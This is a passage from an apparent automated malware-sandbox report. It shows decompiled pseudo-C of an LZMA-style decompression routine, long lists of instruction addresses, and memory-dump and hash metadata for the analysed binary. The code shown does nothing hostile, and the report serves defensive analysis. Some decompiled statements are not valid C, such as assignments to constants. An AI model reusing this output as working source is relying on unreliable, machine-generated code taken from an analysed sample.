										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                        0x00405f92
                                                                                        0x00405f99
                                                                                        0x00405f9f
                                                                                        0x00405fa5
                                                                                        0x00000000
                                                                                        0x00405fa9
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fbe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x00000000
                                                                                        0x00405fcb
                                                                                        0x00405fcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fd8
                                                                                        0x00405fdb
                                                                                        0x00405fde
                                                                                        0x00405fe0
                                                                                        0x00405fe2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fe8
                                                                                        0x00405feb
                                                                                        0x00405fed
                                                                                        0x00405fee
                                                                                        0x00405ff1
                                                                                        0x00405ff3
                                                                                        0x00405ff4
                                                                                        0x00405ff6
                                                                                        0x00405ff9
                                                                                        0x00405ffe
                                                                                        0x00406003
                                                                                        0x0040600c
                                                                                        0x0040601f
                                                                                        0x00406022
                                                                                        0x0040602b
                                                                                        0x0040602e
                                                                                        0x00406056
                                                                                        0x00406056
                                                                                        0x00406058
                                                                                        0x00406066
                                                                                        0x00406066
                                                                                        0x0040606a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x0040605a
                                                                                        0x0040605d
                                                                                        0x0040605d
                                                                                        0x0040605e
                                                                                        0x0040605e
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x00406030
                                                                                        0x00406034
                                                                                        0x00406039
                                                                                        0x00406039
                                                                                        0x00406042
                                                                                        0x00406048
                                                                                        0x0040604a
                                                                                        0x0040604d
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406070
                                                                                        0x00406070
                                                                                        0x00406074
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x0040607d
                                                                                        0x0040608d
                                                                                        0x00406090
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406096
                                                                                        0x00406096
                                                                                        0x0040609a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040609c
                                                                                        0x0040609f
                                                                                        0x004060a2
                                                                                        0x004060cc
                                                                                        0x004060d2
                                                                                        0x004060d9
                                                                                        0x00000000
                                                                                        0x004060d9
                                                                                        0x004060a4
                                                                                        0x004060a8
                                                                                        0x004060ab
                                                                                        0x004060b0
                                                                                        0x004060b0
                                                                                        0x004060bb
                                                                                        0x004060c1
                                                                                        0x004060c3
                                                                                        0x004060c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040610b
                                                                                        0x00406111
                                                                                        0x00406114
                                                                                        0x00406121
                                                                                        0x00406129
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060e0
                                                                                        0x004060e0
                                                                                        0x004060e4
                                                                                        0x0040692f
                                                                                        0x00000000
                                                                                        0x0040692f
                                                                                        0x004060f0
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fe
                                                                                        0x00406101
                                                                                        0x00406104
                                                                                        0x00406107
                                                                                        0x00406109
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067af
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067e5
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067ee
                                                                                        0x004067ee
                                                                                        0x004067f2
                                                                                        0x004069a1
                                                                                        0x00000000
                                                                                        0x004069a1
                                                                                        0x004067fe
                                                                                        0x00406805
                                                                                        0x0040680d
                                                                                        0x0040680d
                                                                                        0x0040680d
                                                                                        0x00406810
                                                                                        0x00406813
                                                                                        0x00406813
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406131
                                                                                        0x00406133
                                                                                        0x00406136
                                                                                        0x004061a7
                                                                                        0x004061aa
                                                                                        0x004061ad
                                                                                        0x004061b4
                                                                                        0x004061be
                                                                                        0x00000000
                                                                                        0x004061be
                                                                                        0x00406138
                                                                                        0x0040613c
                                                                                        0x0040613f
                                                                                        0x00406141
                                                                                        0x00406144
                                                                                        0x00406147
                                                                                        0x00406149
                                                                                        0x0040614c
                                                                                        0x0040614e
                                                                                        0x00406153
                                                                                        0x00406156
                                                                                        0x00406159
                                                                                        0x0040615d
                                                                                        0x00406164
                                                                                        0x00406167
                                                                                        0x0040616e
                                                                                        0x00406172
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x0040617e
                                                                                        0x00406181
                                                                                        0x0040619f
                                                                                        0x004061a1
                                                                                        0x00000000
                                                                                        0x004061a1
                                                                                        0x00406183
                                                                                        0x00406186
                                                                                        0x00406189
                                                                                        0x0040618c
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x00406191
                                                                                        0x00406194
                                                                                        0x00406196
                                                                                        0x00406197
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063d0
                                                                                        0x004063d4
                                                                                        0x004063f2
                                                                                        0x004063f5
                                                                                        0x004063fc
                                                                                        0x004063ff
                                                                                        0x00406402
                                                                                        0x00406405
                                                                                        0x00406408
                                                                                        0x0040640b
                                                                                        0x0040640d
                                                                                        0x00406414
                                                                                        0x00406415
                                                                                        0x00406417
                                                                                        0x0040641a
                                                                                        0x0040641d
                                                                                        0x00406420
                                                                                        0x00406420
                                                                                        0x00406425
                                                                                        0x00000000
                                                                                        0x00406425
                                                                                        0x004063d6
                                                                                        0x004063d9
                                                                                        0x004063dc
                                                                                        0x004063e6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040643a
                                                                                        0x0040643e
                                                                                        0x00406461
                                                                                        0x00406464
                                                                                        0x00406467
                                                                                        0x00406471
                                                                                        0x00406440
                                                                                        0x00406440
                                                                                        0x00406443
                                                                                        0x00406446
                                                                                        0x00406449
                                                                                        0x00406456
                                                                                        0x00406459
                                                                                        0x00406459
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040647d
                                                                                        0x00406481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406487
                                                                                        0x0040648b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406491
                                                                                        0x00406493
                                                                                        0x00406497
                                                                                        0x00406497
                                                                                        0x0040649a
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064ee
                                                                                        0x004064f2
                                                                                        0x004064f9
                                                                                        0x004064fc
                                                                                        0x004064ff
                                                                                        0x00406509
                                                                                        0x00000000
                                                                                        0x00406509
                                                                                        0x004064f4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406515
                                                                                        0x00406519
                                                                                        0x00406520
                                                                                        0x00406523
                                                                                        0x00406526
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x00406529
                                                                                        0x0040652c
                                                                                        0x0040652f
                                                                                        0x0040652f
                                                                                        0x00406532
                                                                                        0x00406535
                                                                                        0x00406538
                                                                                        0x00406538
                                                                                        0x0040653b
                                                                                        0x00406542
                                                                                        0x00406547
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065d5
                                                                                        0x004065d9
                                                                                        0x00406977
                                                                                        0x00000000
                                                                                        0x00406977
                                                                                        0x004065df
                                                                                        0x004065e2
                                                                                        0x004065e5
                                                                                        0x004065e9
                                                                                        0x004065ec
                                                                                        0x004065f2
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f7
                                                                                        0x004065fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061ca
                                                                                        0x004061ca
                                                                                        0x004061ce
                                                                                        0x0040693b
                                                                                        0x00000000
                                                                                        0x0040693b
                                                                                        0x004061d4
                                                                                        0x004061d7
                                                                                        0x004061da
                                                                                        0x004061de
                                                                                        0x004061e1
                                                                                        0x004061e7
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061ec
                                                                                        0x004061ef
                                                                                        0x004061ef
                                                                                        0x004061f2
                                                                                        0x004061f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061fb
                                                                                        0x00406201
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406207
                                                                                        0x00406207
                                                                                        0x0040620b
                                                                                        0x0040620e
                                                                                        0x00406211
                                                                                        0x00406214
                                                                                        0x00406217
                                                                                        0x00406218
                                                                                        0x0040621b
                                                                                        0x0040621d
                                                                                        0x00406223
                                                                                        0x00406226
                                                                                        0x00406229
                                                                                        0x0040622c
                                                                                        0x0040622f
                                                                                        0x00406232
                                                                                        0x00406235
                                                                                        0x00406251
                                                                                        0x00406254
                                                                                        0x00406257
                                                                                        0x0040625a
                                                                                        0x00406261
                                                                                        0x00406265
                                                                                        0x00406267
                                                                                        0x0040626b
                                                                                        0x00406237
                                                                                        0x00406237
                                                                                        0x0040623b
                                                                                        0x00406243
                                                                                        0x00406248
                                                                                        0x0040624a
                                                                                        0x0040624c
                                                                                        0x0040624c
                                                                                        0x0040626e
                                                                                        0x00406275
                                                                                        0x00406278
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x00406283
                                                                                        0x00406283
                                                                                        0x00406287
                                                                                        0x00406947
                                                                                        0x00000000
                                                                                        0x00406947
                                                                                        0x0040628d
                                                                                        0x00406290
                                                                                        0x00406293
                                                                                        0x00406297
                                                                                        0x0040629a
                                                                                        0x004062a0
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a5
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004062b0
                                                                                        0x004062b3
                                                                                        0x004062b6
                                                                                        0x004062b9
                                                                                        0x004062bc
                                                                                        0x004062bf
                                                                                        0x004062c2
                                                                                        0x004062c5
                                                                                        0x004062c8
                                                                                        0x004062cb
                                                                                        0x004062ce
                                                                                        0x004062e6
                                                                                        0x004062e9
                                                                                        0x004062ec
                                                                                        0x004062ef
                                                                                        0x004062ef
                                                                                        0x004062f2
                                                                                        0x004062f6
                                                                                        0x004062f8
                                                                                        0x004062d0
                                                                                        0x004062d0
                                                                                        0x004062d8
                                                                                        0x004062dd
                                                                                        0x004062df
                                                                                        0x004062e1
                                                                                        0x004062e1
                                                                                        0x004062fb
                                                                                        0x00406302
                                                                                        0x00406305
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x0040636c
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00000000
                                                                                        0x00406313
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x0040638f
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063ba
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063bf
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00000000
                                                                                        0x0040685b
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406899
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x00406819
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068bd
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068ef
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x004069b7
                                                                                        0x004069bd
                                                                                        0x004069bf
                                                                                        0x004069c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                        • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                        • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                        • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
